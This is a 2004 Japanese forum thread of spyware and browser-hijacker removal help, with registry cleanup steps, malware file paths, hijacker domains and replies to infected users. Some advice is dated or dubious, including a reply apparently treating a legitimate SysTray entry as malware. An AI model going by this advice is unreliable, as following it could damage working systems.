1 :
ひよこ名無しさん :
04/08/30 06:46 ID:NyRcn5GM エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
・ まず、テンプレサイト(
http://haiiro.info/my/text/template.html )を必ず読む。
・ テンプレサイトの補足(
>>2-10 あたり)を必ず読む。
▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━
・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。
・ 出された指示を実行せずにレスする人は、徹底放置して下さい。
・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。
・ 放置ができない回答者は、質問者が自作自演していると見なされます。
▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
・ マルチポスト(複数の板・スレで同じことを質問)
・ 情報の小出し(始めにOSやソフト名等を必ず明示)
・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も違法です。
質問する前に
1) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
プログラム→WEB設定のリセット
※WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為)
2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット
一時ファイル→クッキーの削除+ファイルの削除
3) 削除したいファイルがあるが「アクセスできません。使用中です」等といわれて
削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
4) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
アプリケーションの追加と削除→OS再起動
※コントロールパネルからアンインストールしなければならない主なもの
CnsMin(Jwordとかで使われてるスパイウェア)
http://higaitaisaku.web.infoseek.co.jp/removecnsmin.html その他のコントロールパネルからアンインストールできる主なもの
http://higaitaisaku.web.infoseek.co.jp/uninstallinfo.html ※コントロールパネルからアンインストールしてはならないもの
Home Search Assistant、Shopping Wizard、Search Extender
という名前のものがコントロールパネルのアプリケーションにある場合。
9 :
1 :04/08/30 06:56 ID:NyRcn5GM
-----------------------テンプレここまで-----------------------
補足:スレ立て時点の各アンチスパイウェアソフトのバージョン CWShredder 1.59.1 Spybot S&D 1.3 2004/08/20 Ad-awareSE SE1R5 22.08.2004 HijackThis 1.98.2 ※必ず最新の定義、最新のソフトにしてからスキャン・駆除しましょう。 古い定義、古いソフトでスキャン・駆除しても無意味です。
( ´,_・・`)フンッ スレ立てヘタクソ
■流行中のハイジャッカー対策 about:blank、search for型
症状:IEのホームページの設定がabout:blank(空白)であるにもかかわらず、CoolWebSearch系
のsearchexe.comや、search for…と表示されるサイトに飛ばされる。
「被害対策」に詳しい専用ページ↓があるが、詳しすぎて初心者は息切れしそうなのでw
「解説の解説」をしておく。
http://higaitaisaku.web.infoseek.co.jp/removeaboutblank.html 「レジストリのAppInit_dllsという値の削除」と、「悪サイトの画面のソースコードを解読して
悪ファイル本体を探す」というのがポイント。
1 《応急処置》
>>2 をまず実行。特にWEB設定のリセットを確実に。
2 レジストリのAppInit_dllsキーの削除→ここには悪以外存在しないので問答無用で削除。
キー名称:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
レジストリエディタでこのキーを開く。右側窓でAppInit_dllsを選択、削除。もし削除が拒否
されたときは、左側窓で\Windowsというキー名称をWindows2などに変更してからAppInit_dlls
を削除→Windows2を元のWindowsに戻す→Windows再起動
詳しいことは→
http://higaitaisaku.web.infoseek.co.jp/appinitdlls.html 3 about:blankで「Search For...」に飛ばされる場合、悪ファイルの素性が画面ソースのなかに
エンコードされているので、解読して削除する。
方法:Search for画面の適当な場所を右クリック→「ソースの表示」をクリック→
メモ帳が開く→ <!-- saved from url=res:// エンコードされた文字列>という部分をコピー
(エンコード文字列の例)
<!-- saved from url=res://%43%3a%5c%57%49%4e%44%4f%57%53%5c%53%59%53%54%45%4d%5c%47%49%4e%43%4e%45%41%2e%44%4c%4c/%73%70%2e%68%74%6d%6c --> ←"<" から ">" までコピーする
→コピーした文字列を
http://higaitaisaku.web.infoseek.co.jp/aboutblankdetector.html このページに貼り付けてDecode Thisボタンを押して解読→悪ファイルの名称と位置がわかる
→Windowsをセーフモードで(F8連打して)起動して見つかったファイルを削除する→(゚д゚)ウマー
4 Windowsを再起動、念のため《応急処置》をもう一度実行する。
■流行中のハイジャッカーjksearch.biz対策
★症状:IEのホームページが以下のようなエロ系サーチサイトに固定される。
http:// greatsearch.biz/
http:// jksearch.biz/redir.php
http:// cashsearch.biz/redir.php
http:// 213.159.117.130/cgi-bin/index.cgi?c=1
★HijackThisでログを取っても異常が現れない。
★ハイジャッカーの本体はCWSearchの亜種。ただしHijackthisがスキャンしない
レジストリ項目 shellServiceObjectDelayLoadに巣食うので駆除が面倒。
http://higaitaisaku.web.infoseek.co.jp/removesearchbiz.html 被害対策のページ↑は初心者でも確実に駆除できるよう各種ツールを利用しているが、
ここではもう少し簡略な手動駆除方法を紹介。
★感染確認
スタート→ファイル名を指定して実行→regedit
レジストリエディタを起動したら左窓で順次ツリーを開いて以下のキーを開く。
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\shellServiceObjectDelayLoad"
ここに"system"というエントリができていれば感染している。
★駆除方法
1)system エントリのCLSIDの値をメモする。(メモ帳にコピペして.txtファイルで保存しておく)
(例) System = {362A19F1-EA5D-4733-8292-58DECE98C0BC} ←この{ }内の英数字
2)System 項目をレジストリエディタで選択→右クリック→削除。
HKEY_CLASSES_ROOT\CLSID\にもこの値が登録されているので問題のCLSIDの値で検索し、
同様に削除。 (左窓でHKEY_CLASSES_ROOT\CLSID\を選択反転→メニュー→編集→検索)
3)Hijackthisでスキャン→R1〜R3 -Internet Explorerのスタートページやサーチページの値→
後からどうにでもできるから、見覚えないもの、分からないものは全部削除
4)IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→プログラム→
WEB設定のリセット IEの履歴削除→ツール→インターネットオプション→全般→インターネット
一時ファイル→クッキーの削除+ファイルの削除→OS再起動
5)本体ファイル↓を削除
C:\WINDOWS\system32\system32.dll / C:\WINDOWS\system.exe
★ よくある質問とその答え(その1) Q1:エロサイト見てたら広告がどんどん出るんだけど A1:Proxomitron使うとかタブブラウザ使うとかしろ。IEでエロサイト見るな。 Q2:ダイヤルQ2に繋がったらしいんだけど A2:ダイヤルアップネットワークを開いて接続アイコンを確認しろ。 変なのあったら捨てろ Q3:何かダウンロードしたみたい A3:Q2か国際電話の接続ソフトじゃねえのか?ワケも分からずクリックすんな。 Q4:ダイヤルQ2って何? A4:情報料のかかるNTTの商品だ。3分100円ぐらい通話料の他に発生する。 Q5:Q2に繋がらないようにしたい A5:NTTに連絡しろ。116に電話してQ2使えないようにしてくれって言え。 Q6:なんかどこクリックしても別のサイトに行くんだけど? A6:騙されてんじゃねえの?騙しで広告クリック稼ぐサイトも多いぞ(w Q7:何か注意点とかある? A7:エロサイトなんか見るなよ。トラブルの元だ。 Q8:スタートページとかがエロになった A8:過去ログ読んでから質問しろ。非常によくある質問だ。 Q9:時計の隣になんか常駐してるんだけど A9:msconfigで切れ。Win2000なら窓の手つかえ。
>>12 を貼ってる奴は、本当に理解して貼ってるか?
ただの天麩羅屋じゃねーの?という訳で一番重要な
>>12 の続き
(ここから)
5 マイコンピュータからCドライブの[on-line.exe]という文字列を含むファイルを検索。
(「ファイル名を検索」ではないので注意。検索画面で「含まれる文字列」窓にon-line.exeと
入力する)→感染時刻に生成された「ランダム名.chm」があったら名前をメモ→
hoge.chmならhoge.chm.safeにリネームして様子見
6 念のためさらに…
マイコンピュータからCドライブの*.chmを検索。感染時刻に生成された「ランダム名.chm」が
あったら4と同様、名前をメモ→リネームして様子見
7 Windowsを再起動、《応急処置》をもう一度実行してゴミ掃除
★ よくある質問とその答え(その2) Q10: ホームページや検索窓がエロサイトになってしまった! A10:Internet Explorerの場合: ・ツール>インターネットオプション>全般>ホームページ ・ツール>インターネットオプション>プログラム>WEBの設定のリセット Netscapeの場合:編集→設定→Navigator→ホームページ Q11:インターネットオプションで直しても、再起動するとまた戻ってる! A11:スタート>ファイル名を指定して実行>msconfig>スタートアップの項目に ついてるチェックを全て外して再起動。 再起動したら、今度は1つずつチェックを戻していって、エロなホームページ になるかどうかを確認していく。何度も根気強くmsconfigと再起動を繰り返して 最終的には最初にチェックを外したやつのほとんどはチェックが戻り、僅かなエ ロサイト関連のものだけチェックが外れた状態になればOK! ※Windows95とWindows2000はmsconfigが無いので窓の手を使用するかレジストリの run項目をチェック。これで直ったなら怪しい自動実行プログラムを削除。 Q12:なんか定期的にエロサイトの広告ウインドウが出るんですけど? A12:まずはA10とA11を実行。その上でウィルススキャン、Ad-awareでスパイウェ アをスキャン。Ad-Awareは最新版を使うこと。 Q13:検索が英語になった! A13:インターネットオプション>全般>言語>日本語 を一番上に。 Q14:なんかGoHip!とかって・・・ A14:GoHip!やSecondpower等は専用の削除ツールが配布されている。インターネッ トオプション>全般>一時ファイルの設定>オブジェクトの表示でMicrosoftや ShockWave Flash等信用できるもの以外の怪しげなのは依存関係を見てファイル を削除。
Q11の補足説明 ■=チェック済 □=チェック無で解説 1:全部チェック外す □adosh □ghohga □mojgoj ※症状は出ない 2:1つずつチェック入れていく ■adosh □ghohga □mojgoj ※症状は出ない 3:1つずつチェック入れていく ■adosh ■ghohga □mojgoj ※症状がキタ━━━━━━(゚∀゚)━━━━━━!!!! 4:1つずつチェック入れていく ■adosh ■ghohga ■mojgoj ※症状が出たまま 5:症状を出すやつが特定出来たので、症状と関係ないもののチェックを戻す ■adosh □ghohga ■mojgoj 6:終了
いいか、みんな
(゚д゚ )
(| y |)
検索するなら
( ゚д゚) Ctrl+F
(| y |\/
ガイシュツネタには
( ゚д゚) 過去ログ嫁
(| y |\/
アンカーもつけてやれば親切だ
>>7 ( ゚д゚)
>>8 \/| y |\/
テンプレは
>>1-16 のどこかにある
(゚д゚ )
(| y |)
いい加減まとめサイトの作者は、ページ更新して整理しなおせよ。
ベタベタテンプレが
>>1-20 とか貼られてるの、うぜーよマジで。
まとめサイトが更新してれば、テンプレ貼る必要もねーんだよボケ
まとめサイトに誘導すると、なぜかスレが荒れるんだよなw
>>20 まったくだな。
ちょっとはスパイウェアのこと知ってる漏れでもテンプレ見渡しただけでウンザリしてくるわ。
・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も違法です。
こんなネタみたいなこと
>>1 に貼り付けんなよ。初めてみるやつに解るか?自分の視点でしか見れないのかYO!!
, -‐−-、 ヽ∧∧∧ // |
. /////_ハ ヽ< 釣れた!> ハ
レ//j け ,fjlリ / ∨∨V ヽ h. ゚l;←
>>24 =天麩羅屋
ハイイト、"ヮノハ // |::: j 。
/⌒ヽヾ'リ、 // ヾ、≦ '
. { j`ー' ハ // ヽ∧∧∧∧∧∧∨/
k〜'l レヘ. ,r'ス < 初めてなのに >
| ヽ \ ト、 ヽ-kヾソ < 釣れちゃった!>
. l \ `ー‐ゝ-〈/´ / ∨∨∨∨∨∨ヽ
l `ー-、___ノ
ハ ´ ̄` 〈/‐-、
>>24 あのさー、みんなおまえが天麩羅屋だって分かってるんだよねぇw
/ ̄ ̄ ̄ ̄\ / ⌒ ⌒\ / ・ ・ | |(6 つ | | 三 | 三 | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | \_|_/ | < もうお客さん来ないかも \ \__ノ / \__________ / \ ___/\ │ ∴∵━━○━∴│ ____ ───────────── /∵∴∵∴\──── /∵∴/∴∵\\ _。_ 旦~ /∵∴< >∴∴.< >| c(_ア |∵∵∵/ ●\∵| |∵∵ / | | |∵∵ | | | \∵ | |/ \|
お前ら、そんな事言ってるとOpera勧められっぞw
>>26 そうやっていつも荒らしてるんだよな?おまえは。まったくヒマなことだ。
>>11-29 以上(・∀・)ジサクジエーンでお送りしました
↓何事もなかったかのようにスレ再開↓
32 :
ひよこ名無しさん :04/08/30 08:49 ID:7Ao+nPq9
テンプレに従って色々やってたのですが スキャンディスクのチェックをしようと ローカルディスクをプロパティで開き ツールからエラーチェックを押したら 「スキャンディスクが見つかりません。プログラム、ファイルが壊れてるか削除されています。もう一度ウィンドゥズセットナップを実行してインストールしてください」と表示されました。 これってどうすればいいですか?? よろしくお願いします。
>>32 スキャンディスクのファイルが削除されてる、壊れてる
=システムの必要なファイルすら壊れてる、もうどうしようもない状態
俺は素直にリカバリーする事をお勧めするよ。ぬるぽウィルスかなんかか?
>>32 OSが書いてないからわからないが、システムの復元ができるなら
システムの復元を試してみれば?
システムの復元してもダメとか、システム復元できないOSならば
素直にリカバリした方がいいよ。スキャンディスクがないってのは異常。
36 :
32 :04/08/30 09:04 ID:7Ao+nPq9
>>33 レスありがとうございます。
Msbbとかいうスパイだそうです。
パソコン起動時にフリーズさせてきたりします。
シュレッダーやスパイボッド?もしましたが削除しきれていないようです。
リカバリーとはメールアドレスやダイヤルアップなどの設定を一から行わなくては駄目なんですよね?
>>36 リカバリは、本当に1から全部やり直し。
だから、OSがXPとかMeならまずシステムの復元を試してみろ。
天麩羅屋ってだれ?
41 :
32 :04/08/30 09:12 ID:7Ao+nPq9
>>35 レスありがとうございます
OS書くの忘れました、ごめんなさい。
ウィンMeでCompaqのサザンクロスです。
デフラグも同じエラーが表示されました。
買い換えはやりすぎですか?
リカバリだとバックアップ取るのが大変そうですよね?
>>41 だからMeなら、「システムの復元」で少し前の日付に復元してみろ。
スキャンディスクもデフラグもできないのは、かなり異常な状態だよ。
ウィルスを駆除しても、システムに必要なファイルが揃ってない状態。
全部の復元ポイントを試してもダメなら、仕方ないからリカバリしろ。
(バックアップファイルにウィルスが紛れ込んでる可能性があるから、
バックアップも本当にないと困るもの最小限度にしろ)
買い替えは、ハードディスクが壊れてなければ、しなくて平気だと思う。
>>41 リカバリを喜んでできる人間になれ。
このまま直ったとしても必ず決定的なトラブルに見舞われるぞ。
46 :
ひよこ名無しさん :04/08/30 10:26 ID:wl6VjOAn
48 :
ひよこ名無しさん :04/08/30 10:32 ID:wl6VjOAn
>>47 ご丁寧にありがとうございます。
あと、最後にお尋ねしたいのですが、部落らのURLを踏んでこのような事態に
なったのですが、やはりカード番号・住所・メールアドレス・リンク先等の
個人情報は流失してしまったのでしょうか?
それが激しく心配なのですが。。。
部落らって言っても種類がいっぱいあるんだ。
>>48 ブラクラでCnsMinがインストールされるなんて聞いた事ないぞ?
51 :
ひよこ名無しさん :04/08/30 10:41 ID:wl6VjOAn
>>51 【悪意あるコード有り。telnet,OE,WMP,RealPlayer等,いろんなメディアが立ち上がる[2003/11/21]】
たぶん、CnsMinは全然関係ないぽ。元々入ってただけじゃねーの?
全く気にしないのはダメだが、気にしすぎもダメぽ。
53 :
ひよこ名無しさん :04/08/30 10:49 ID:wl6VjOAn
>>52 >>たぶん、CnsMinは全然関係ないぽ。元々入ってただけじゃねーの?
そうですか。前からだったんですか。
じゃあ個人情報は流れてますね。。。
>>telnet,OE,WMP,RealPlayer等,いろんなメディアが立ち上がる[2003/11/21]
怖いな。
でも、スパイウエアスキャンしてもう大丈夫ですよね。
54 :
32 :04/08/30 10:50 ID:7Ao+nPq9
色々教えて下さってありがとうございます また昼過ぎたらやってみます!
>>53-54 ちゃんと「CnsMinの除去方法」の解説読んでるか?
>CnsMinは、いわゆる「Browser hijacker」でIEの検索バーの機能を乗っ取るものです。
>機能としては、中国語で検索が行われたときにそれをスパイウェアの作成元に送信します。
個人情報つっても、最悪でも「どんな検索履歴か」ぐらいしか送られてないよ。
そんなに心配なら、感染する前からここのテンプレにあるソフトを入れてまめにスキャンするとか、
セキュリティ板にいくつか紹介されてる予防ソフトとかを入れておけばいいだけじゃん。
予防もしないで、「感染しちゃった、最悪だー」って悔やんだところで、何も解決しないよ。
56 :
ひよこ名無しさん :04/08/30 11:04 ID:wl6VjOAn
>>55 >>個人情報つっても、最悪でも「どんな検索履歴か」ぐらいしか送られてないよ。
そうですか、安心しました。
ノートンは入れてあったんですが、スパイウエアは初めてだったのでかなり
ナーバスになっていました。
自分の勉強不足を恥じているところです。
ご丁寧に教えていただき本当にありがとうございました。
あい。
エロ画像って動画とかと違って 保存した後消しても痕跡が残らないよね・・・ なんか、復元とかで履歴が残ったり
>>58 Wipe使わないと諸バレだ。復元も可能。
嫌ならHDD燃やすしかないなw
Tempフォルダの中にTemporary Internet Filesフォルダができるのって普通? 最近こうなったみたいなんだけど、設定で変える方法もわからない。 Cookies、HistoryフォルダもTempフォルダの中にできてる。 今までずっとD://Temporary Internet Filesだったんだけどなあ。誰かわかる?
,-┐
,ィ─、ri´^-─- 、 .┌f^f^f^f^f^f^f^f^f^┐
く / , ,' ヽ ヽ| ~ ~ ~ ~ ~ ~ ~ ~ ~│
`<' / ,'レイ+tVvヽ!ヽト 知ってるが │
!/ ,' i |' {] , [}|ヽリ
>>60 の態度が |
`!_{ iハト、__iフ,ノリ,n 気に入らない |
// (^~ ̄ ̄∃_ア____n_____|
_r''‐〈 `´ア/トr──!,.--'
<_>─}、 `」レ
'ヽ、 ,.ヘーァtイ 質問する時の言葉遣いやルールぐらい読め、デブ
Y、.,___/ |.|
| i `ー'i´
62 :
60 :04/08/30 13:51 ID:???
知ってる人、というか俺と同じやついる?
63 :
60 :04/08/30 13:54 ID:c+dJiagG
あ、釣りじゃないからさ。エロイ人頼む。
64 :
32 :04/08/30 13:55 ID:7Ao+nPq9
バックアップを取ろうかなと思ったんですがパソコン本体にCDーRを入れて焼くなんてのはムリなんですよね? やっぱりフロッピーなんかじゃなきゃバックアップは取れないんでしょうか? バックアップ取るのにフロッピーの種類とかはないんでしょうか?教えてちゃんでごめんなさい。今からシステムの復元してみますね。
65 :
ひよこ名無しさん :04/08/30 13:56 ID:70gB2ZGH
OSはWindowsXPでIE使用です。 テンプレサイトに飛ぼうとしても、海外のサイトに飛ばされてしまい、大変困っています。 いちおう補足にあった事はすべて試したのですが、履歴を消すことが出来ず、また、ホームページの設定も変えることが出来ません。 『Hardcore TEEN SEX』というものがデスクトップにあり、インストールされてしまっているようです。 IEをしばらく開いているとエラーになり強制終了されてしまいます。 テンプレを読むことが出来ないので、初歩的なものだったら申し訳ないのですが、どなたか助けて下さい…
>>63 エロイ人間はこの板にはいないから、別所で聞いてね。
67 :
ひよこ名無しさん :04/08/30 14:00 ID:tSQS7P7W
('・〜・`)ぽれも昔はやられたぽ ぽれの同郷をよろしく頼むぽ
68 :
ひよこ名無しさん :04/08/30 14:04 ID:GtdpnwCG
70 :
69 :04/08/30 14:20 ID:???
>>65 他のブラウザ(Netscapeとか、Operaとか、FireFoxとか)は入ってないの?
2ちゃんには普通に来られるのか?
73 :
65 :04/08/30 14:38 ID:70gB2ZGH
>>71 入っていないと思います。
>>72 専用ブラウザなら来れますが、IEだとすぐに終了してしまいます。
さきほどの現象に加えて、新たにデスクトップのアイコン、ツールバーなどが拡大する現象が起きました。
再起動してしまったのがいけなかったですかね‥?
75 :
65 :04/08/30 14:49 ID:70gB2ZGH
>>74 テンプレサイト、行けました!
ありがとうございます。
>>75 なら、それでテンプレの各ソフトをダウンロードして全部実行してみれ。
77 :
32 :04/08/30 15:22 ID:BevI4vt4
システムの復元終了しました。 これで完璧にウィルスがいなくなったんでしょうか?? cwshredderもしてみましたが Cleaning up orphaned leftorers done!! となるんですが、これはまだウィルスが残ってるということでしょうか?
>>77 システムの復元は、レジストリー値を戻すだけ
問題のファイル自体は残っているので、削除しろ
発動させずに問題のファイル削除できれば、復元終了
>>77 おまい、スキャンディスクもできないんだろ?システムがやられてるんだよ。
スパイウェア心配している場合じゃないだろ。さっさとリカバリしろ。
これはおまいの為に言っている。
82 :
65 :04/08/30 15:31 ID:70gB2ZGH
あの、CooLWebShredderはダウンロードして実行したのですが、 あとの二つのダウンロード方法がよく分かりません‥(つД`) CooLでは、さきほどの『Hardcore』は削除できないようです。 皆様親切にありがとうございます。
>>82 Ad-awareSEも、Spybotも公式ページだ。穴が開くほど読め。
英語がわからないなら辞書引け。WEB翻訳使え。
>>80 誰かこのバカにシステムの復元タスクの監視拡張子ファイルを教えてやってくれ!
つうか
>>32 はウィルススキャンとかやったのかな。一言も触れてないが。
>システムの復元は、レジストリー値を戻すだけ ちがう
>>77 結局システムの復元をして、スキャンディスクは使えるようになったのか?
CWShredder以外のテンプレはやったのか?
アンチウィルスソフトは入ってるのか?(どう見ても入ってなさそうなんだけど)
88 :
32 :04/08/30 15:53 ID:ctYbZq+O
さっき再起動したらスキャンディスクは出来るようになってました。 試したことと言えば McAfee VShieldとSpybotとCWShredderです。 システムの復元をして スタートアップ時のフリーズを止めるため スタートアップタブでMsbbのチェックを外しました。 以前は「Msbbの一般保護エラーです」とか 真っ黒い画面に白いバーが出てきて この文字が表示されたりしていましたが 今は落ち着いています。 根本的に削除する方法といえば、やはりリカバリしかないのでしょうかね?? 素人のあたしがリカバリして一から設定し直すなんて ネットに接続出来なくなりそうで怖いです。。。
90 :
32 :04/08/30 15:57 ID:???
アンチウィルスソフトですか・・・? すいません、わかりません。。。 テンプレの1つ「日本語パッチ」?とかいうのダウンロードしてみましたが 「失敗しました」と出て起動出来ませんでした。
[システムの復元] ファイル・システム・フィルタ・ドライバと呼ばれるカーネル・レベルのドライバを利用して、 Windowsの中核となるシステム・ファイルやアプリケーション・ファイルに対する操作を 監視している。そして、それらのファイルに対する変更処理を検出すると、変更処理を 実行する以前のファイルの状態を記録し、ファイルをコピーまたは移動する。 例えばファイルの削除が実行されたら、フィルタによって削除処理に割り込み、当該 ファイルを別の場所にコピーし、削除処理によってファイルがコピーされたことをログに 記録しておく。このようにして「システムの復元」では、システム・ファイルに加えられた 変更内容を逐一追跡し、復元ポイントを保存できるようにしている。 この辺に詳しく書かれている 「システム・クラッシュからの復活」 tp://www.atmarkit.co.jp/fwin2k/operation/srestore/srestore_01.html
92 :
32 :04/08/30 16:00 ID:???
つД`) タスケレ !!
>>88 スキャンディスクができるようになったなら、テンプレ全部やれ。
テンプレやるのが面倒くさいなら、リカバリしろ。
McAfee VShieldって時点で、多分ふるーいMcAfeeなんだろうなと思った。
>>3 のオンラインスキャンは絶対やれ。俺は100%ウィルス入ってると思う。
94 :
32 :04/08/30 16:04 ID:???
McAfeeをばかにしないで
>>89 何でリカバリーにこだわるの?
普通必要なデータのバックアップしてからじゃないと
リカバリーするわけには行かないだろうし、現状では
バックアップできる環境では無いと書かれているでしょ
32 ID出したり、出さなかったり
真偽が分からんちゃんとしろよ
こいつのパソコン窓から捨ててぇぇえぇぇぇええええええwwwwwwwwwww
97 :
32 :04/08/30 16:05 ID:???
>>96 そうしてーええええええええええええええええええええぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇwwwwww
>>95 ファイアーウォールもないだろうからトロイの発信源なんだぞ。
リカバリ、つうかホントに窓から捨ててやりたいよ。
被害は俺らに来るってえのに悠長に構えすぎだよおまえ。
はやくウンチウィルスソフト買ってこいやぁぁぁぁあああああ!!!!1!
104 :
32 :04/08/30 16:16 ID:???
いまから買いに行ってきます!
105 :
32 :04/08/30 16:19 ID:???
今からコロッケ買ってきます
106 :
32 :04/08/30 16:25 ID:???
108 :
ひよこ名無しさん :04/08/30 16:30 ID:rR454xjg
パソコンつけるといつもdxなんとかっていうエロサイトが開くんですけど…^^;ホームは直たんですけど。これって何なんですか?
どう見てもさげてる32は騙りだろうって
>dxなんとか 謎掛けしてんじゃねえよ
111 :
32 :04/08/30 16:34 ID:ctYbZq+O
90から一度も書き込みしてませんので・・・
困惑させてしまってごめんなさい。。。
>>3 のオンラインスキャン今やってみますね。
何度もごめんなさい。
<=^u^=>みんな仲良くするニダよ
113 :
ひよこ名無しさん :04/08/30 16:39 ID:rR454xjg
115 :
65 :04/08/30 16:48 ID:70gB2ZGH
>>65 IEはまだ使えない状態なのか?アンチウィルスソフトは入ってるの?
その症状はたぶんウィルスの仕業だと思うんだけど。
121 :
32 :04/08/30 17:00 ID:ctYbZq+O
Ad-awareSE日本語化パッチがうまくできません。 デスクトップに保存するのが間違っているんでしょうか? デスクトップに置いた後 解凍してダブルクリックしてますが 失敗しましたと表示されてしまいます。 どなたかお教え下さいませんか? お願い致します。
>>121 ( ゚Д゚)ハァ? 英語版でやれよ馬鹿
>>121 (・3・) エェー 大概の日本語化パッチは 当てるファイルと同じフォルダに放り込んで実行しないと駄目だYO
説明よく読めYO
>>121 Ad-Sware.EXEがある場所でやらないと意味ないぞ。がんがって探せ。
125 :
65 :04/08/30 17:03 ID:70gB2ZGH
皆様有り難うございます。
IEはいまのところ強制終了されません。画面が大きく表示される事以外は普通に使えています。
アンチウィルスソフトはnorton2003が入っています。
テンプレ
>>4 見落としていました。今からいってきます。
>>125 >アンチウィルスソフトはnorton2003が入っています。
最新の定義にアップデートした後にスキャンもしてみた?
画面が大きく表示されるのは、「画面のプロパティ」あたりをいじくれば治るんじゃねーの?
test
128 :
ひよこ名無しさん :04/08/30 17:09 ID:039ZGEws
ダイアルアップの時代なら、Q2とか国際電話で初心者を騙し笑いが止 らないほど儲けるそんな業者が横行していた、ところがADSLが主流の 現在はQ2とか国際が接続できないので商売が上がったりだ。 サンプルだけをあさっていくユーザーに正式な契約させる為に、簡単 に削除できないような迷惑ソフトが開発された、迷惑ソフトは高値で アダルトサイトの業者に飛ぶように売れた。エロ画像のサンプルをダ ンロードするユーザーに効果的に機能している、今かなり流行ってい る。 簡単な仕組みで大勢の初心者を騙し儲けた来た業者は、ユーザーを甘 く見ている、誰もが下らないアダルトサイトに正式に契約すると考え ているから浅はかだ。銀行振込でもカード支払いでも、いったん契約 すると解除できない仕組みになっている、解約は簡単だとか自動的に 解約できますなどと言うのがその証拠だ。不安を抱くユーザーに安心 させる為の騙しだ。大体 無修正などといていながら無修正であったた めしがない、無修正で見れる無料サイトは無料とか無修正なんて一言 も書いていない。迷惑ソフトを開発した企業の技術者が、ここにもか なりレスしているようだが、大勢の人間が迷惑してその効果は十分に 果たした。だから満足していい、簡単にユーザーは解決策は見つけら れない。だからこんな所へ書き込みするのは止めろ。
131 :
32 :04/08/30 18:01 ID:ctYbZq+O
皆さん色々教えて下さって有難う御座います。 今なんとか出来たようです。 288とか数字が出てましたけど あたし英語できないので適当にクリックしてスキャンかけたみたいです。 288とはウィルスの数なんですかね? これでMsbbに関しては解決したんでしょうか?
>>131 Ad-awareSEで288個なら、大半はCookeiじゃないか
>>130 迷惑ソフトの開発技術者の野郎が反応しゃっがった。驚いたね。
>>15 >>20 大体この辺が迷惑ソフト開発技術者か業者だね、テレビでよく元犯罪者とか
にインタビューする番組があるが、あんな風に、何か迷惑ソフトの開発で
苦労した点とか、今後の展望やインターネットの問題点、そうしたら楽して稼げる
かとか、いろいろ書き込んで欲しいものだが。
開発するだけのスキルはなさそう。 罠リンク貼ったり、ロダでバラまいてるだけだろ。
アタマがアレな奴は放っといて、次の患者さんまだかな。
>>135 何が迷惑ソフトだよ
このなの開発している類には入らない
バッファオーバーランのセキュリティホールのスクリプトと既存のスパイウェアプログラムをくっ付けてインストールさせるようにしているだけじゃないか
ただ単に、リンク踏ませるとスパイウェアの開発者にマージンが入るだけじゃないのか?
139 :
ひよこ名無しさん :04/08/30 18:57 ID:g71Qb7Yy
たしけて〜〜〜・・・ win98secなのですが、 マイコンピュータとか、マイピクチャーとかあるじゃないですかそれを開くと、 飛来だフォルダ左の三分の一の部分に情報欄があって、 残り右半分にその中のファイルが普通表示されますよね。 で、その表示方法を、変えるときは、ツールバーにある【表示】って所で 大きいアイコンとか、小さいアイコンに変えれますよね。 その【表示】の中に、98では、Webページっていうのが通常表示方法ぽいのですが いままではその Webページという表示方法で、上記のフォルダ開いたときに 左と右に分割されて表示されてたのですが、 海外サイトをつい見てしまい重くなって再起動した後から、 その Webページ の表記方法にすると、ネットのサイトで画像が削除されて 画像が無い時のマークが左右両方の欄に出て、 ファイルが見れなくなってしまいました。 しかし、【表示】で大きいアイコンや一覧に変えると、一応表示はされるのです よくある、ハードディスクの残量を見るときに、(C;)をクリックすると その、左の情報欄にハードディスクの使用量の円が表示されるところが 何にも表示されないのです。 どうにかお助け下さい・・
140 :
65 :04/08/30 18:58 ID:g6KdlIyV
すいません、テンプレ
>>4 に書いてあった事をやってみたのですが、
CLSIDにでたものがサイトにあったものと違っていたので、
削除していいものか判断してもらえませんか?
こちらです↓
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"PostBootReminder"="{7849596a-48ea-486e-8937-a2a3009f31a9}"
"CDBurn"="{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"WebCheck"="{E6FB5E20-DE35-11CF-9C87-00AA005127ED}"
"SysTray"="{35CEC8A3-2BE6-11D2-8773-92E220524153}"
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524153}]
@="SysTray"
[HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524153}\InprocServer32]
@="C:\\WINDOWS\\System32\\stobject.dll"
"ThreadingModel"="Both"
>>140 同じの食らったことあるけど、それだったよ。
テンプレにあるのは古い例。
なんか海外サイトにつながるやつを踏んでしまって
ウィルスやらスパイウェアやらがいっぱい入ってきました。
テンプレにのっていた除去法と手動削除でなんとかなりつつあるのですが
最初のページが
